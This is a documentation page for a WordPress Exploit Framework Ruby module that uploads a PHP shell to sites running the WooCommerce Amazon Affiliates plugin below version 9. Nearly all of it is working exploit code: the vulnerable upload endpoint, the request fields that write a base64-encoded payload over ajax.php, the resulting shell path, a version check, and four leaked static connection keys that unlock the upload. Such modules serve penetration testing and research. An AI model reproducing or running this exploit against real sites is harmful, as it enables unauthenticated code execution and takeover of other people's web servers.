class Wpxf::Exploit::WoocommerceAmazonAffiliatesV8ShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload::new
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'WooCommerce Amazon Affiliates < v9 Unauthenticated Shell Upload',
    desc: %(
      This module exploits a file upload vulnerability which allows users
      to upload and execute PHP scripts in the context of the web server.

      In order to use this module, a valid connection key must be provided.
      These are statically defined keys, that have been changed on a number
      of occasions.

      Some of the keys that have been identified are:
       - 1ec4614ce9b023d2a58deef6dcabb6ab
       - c125a47cba1e8ec73945dd622d142f79
       - 69efc4922575861f31125878597e97cf
       - 501d0292aca8270d539662a5a9aad855
    ),
    author: [
      'Evex_1337', # Discovery and disclosure
      'rastating'  # WPXF module
    ],
    references: [
      ['WPVDB', '7940']
    ],
    date: 'Apr 25 2015',
    desc_preformatted: true
  )

  register_option(
    StringOption.new(
      name: 'connection_key',
      desc: 'The plugin connection key, see module description for static keys',
      required: true
    )
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 51
def check
  readme = normalize_uri(wordpress_url_plugins, 'woozone', 'changelog.txt')
  check_version_from_custom_file(readme, /##\s\[(\d\.\d(\.\d)*)\]/, '9')
end
emit_usage_info() click to toggle source
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 45
def emit_usage_info
  emit_warning 'When executing this module, the ajax.php file in woozone/modules/remote_support will be deleted. '\
               'In order to be able to re-use this module on the same target, be sure to re-create ajax.php if ' \
               'the selected payload is unable to re-create it automatically.'
end
payload_body_builder() click to toggle source
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 60
def payload_body_builder
  builder = Utility::BodyBuilder.new
  builder.add_field('connection_key', datastore['connection_key'])
  builder.add_field('action', 'save_file')
  builder.add_field('file', 'ajax.php')
  builder.add_field('file_content', Base64.strict_encode64(payload.encoded))
  builder
end
run() click to toggle source
Calls superclass method Wpxf::WordPress::ShellUpload#run
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 77
def run
  payload.enqueue_command('echo "" > ajax.php')
  super
end
uploaded_payload_location() click to toggle source
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 69
def uploaded_payload_location
  normalize_uri(wordpress_url_plugins, 'woozone', 'modules', 'remote_support', 'ajax.php')
end
uploader_url() click to toggle source
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 56
def uploader_url
  normalize_uri(wordpress_url_plugins, 'woozone', 'modules', 'remote_support', 'remote_tunnel.php')
end
validate_upload_result() click to toggle source
# File lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb, line 73
def validate_upload_result
  upload_result.body !~ /Invalid\skey!/i
end